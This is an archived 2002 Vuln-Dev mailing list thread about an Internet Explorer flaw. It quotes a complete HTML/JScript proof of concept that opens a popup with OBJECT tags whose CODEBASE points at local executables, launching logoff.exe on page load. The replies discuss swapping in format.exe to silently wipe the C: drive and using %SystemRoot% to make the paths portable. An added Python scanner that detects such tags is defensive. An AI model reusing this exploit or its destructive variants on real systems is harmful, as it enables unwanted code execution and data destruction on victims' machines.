Vulnerability Development mailing list archives

RE: Rather large MSIE-hole


From: "Jim Harrison (SPG)" <jmharr () microsoft com>
Date: Wed, 13 Mar 2002 11:58:30 -0800

While it's certainly true that you can hard-code any path you want to
any normally-benign executable on the system, any hacker worth their
salt would know how to get and use Windows system variables to make the
system cooperate in its own self-destruction.

For instance, "%SystemRoot%" would eliminate the need for "C:\windows"

* Jim Harrison 
MCP(NT4, 2K), A+, Network+



-----Original Message-----
From: NyQuist [mailto:nyquist () ntlworld com] 
Sent: Wednesday, March 13, 2002 12:46 AM
To: Magnus Bodin
Cc: Vuln-Dev
Subject: Re: Rather large MSIE-hole


If this is confirmed, could this array be changed to equal, erm...let's
say format.exe (with a couple of parameters to silently format C:/)?

 var programName=new Array(
        'c:/windows/system32/logoff.exe',
        'c:/winxp/system32/logoff.exe',
        'c:/winnt/system32/logoff.exe'
 );

On Wed, 2002-03-13 at 06:06, Magnus Bodin wrote:
On Tue, Mar 12, 2002 at 11:32:20AM +0100, Magnus Bodin wrote:

The latest MSIE-hole is now spreading.

Sorry. Something broke there with the inclusion of the code. I've not
done any large scale testing of this apart from getting reports from
a lot of friends and colleagues that they are vulnerable still after
running windows update.

Here it is, complete with all the pop-up-code:

--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>

<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName=new Array(
      'c:/windows/system32/logoff.exe',
      'c:/winxp/system32/logoff.exe',
      'c:/winnt/system32/logoff.exe'
);

function Init(){
      var oPopup=window.createPopup();
      var oPopBody=oPopup.document.body;
      var n,html='';
      for(n=0;n<programName.length;n++)
              html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
      oPopBody.innerHTML=html;
      oPopup.show(290, 390, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----


-- 
magnus                               MICROS~1 BOB was written in Lisp.

            http://x42.com/                          
-- 
NyQuist | Matthew Hall -- NyQuist at ntlworld dot com --
http://NyQuist.port5.com
Sig: #define QUESTION ((bb) || !(bb))

PubKey : 649779B0 (certserver.pgp.com)
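Added example, not part of the original thread: a small scanner for the pattern discussed above, flagging OBJECT tags whose CODEBASE names a local executable, whether as a hard-coded drive path or, as the reply points out, through a Windows environment variable such as %SystemRoot%. The environment values, the sample HTML and the second and third CLSIDs are constructed for the example.

```python
"""Flag <OBJECT> tags whose CODEBASE points at a local executable."""
import re

# Environment values the scanner assumes for expansion (constructed; on a
# real host these would come from os.environ).
ASSUMED_ENV = {"SystemRoot": "C:\\WINDOWS", "windir": "C:\\WINDOWS"}

OBJECT_RE = re.compile(r"<OBJECT\b[^>]*>", re.IGNORECASE)
CODEBASE_RE = re.compile(r"CODEBASE\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)
ENV_RE = re.compile(r"%([^%]+)%")
# Local if it is a file: URL, a drive path, a UNC path, or starts with %VAR%.
LOCAL_RE = re.compile(r"^(?:file:|[a-z]:[\\/]|\\\\|%[^%]+%)", re.IGNORECASE)


def expand_env(path, env=ASSUMED_ENV):
    """Expand %VAR% references the way the Windows shell would."""
    return ENV_RE.sub(lambda m: env.get(m.group(1), m.group(0)), path)


def find_local_codebase(html, env=ASSUMED_ENV):
    """Return (raw, expanded) pairs for every OBJECT whose CODEBASE is local."""
    hits = []
    for tag in OBJECT_RE.findall(html):
        m = CODEBASE_RE.search(tag)
        if not m:
            continue
        raw = m.group(1)
        if LOCAL_RE.match(raw):
            hits.append((raw, expand_env(raw, env)))
    return hits


# Constructed sample: one hard-coded path, one via %SystemRoot%, and one
# ordinary remote CODEBASE that must not be flagged.
SAMPLE_HTML = """
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111'
 CODEBASE='c:/winnt/system32/logoff.exe' %1='r'></OBJECT>
<OBJECT CLASSID='CLSID:22222222-2222-2222-2222-222222222222'
 CODEBASE="%SystemRoot%\\system32\\logoff.exe"></OBJECT>
<OBJECT CLASSID='CLSID:33333333-3333-3333-3333-333333333333'
 CODEBASE="http://example.com/control.cab#version=1,0,0,0"></OBJECT>
"""

if __name__ == "__main__":
    for raw, expanded in find_local_codebase(SAMPLE_HTML):
        print(f"local CODEBASE: {raw!r} -> {expanded!r}")
```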

